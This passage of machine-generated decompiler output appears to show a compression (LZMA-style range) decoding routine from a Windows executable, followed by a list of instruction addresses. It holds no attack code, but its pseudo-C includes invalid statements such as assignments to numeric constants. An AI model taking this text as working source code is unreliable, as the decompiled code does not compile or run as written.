												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004062eb
0x004062eb
0x004062ef
0x00406310
0x00406317
0x0040631d
0x00406323
0x00406335
0x0040633b
0x00406340
0x00000000
0x004062f1
0x004062f7
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
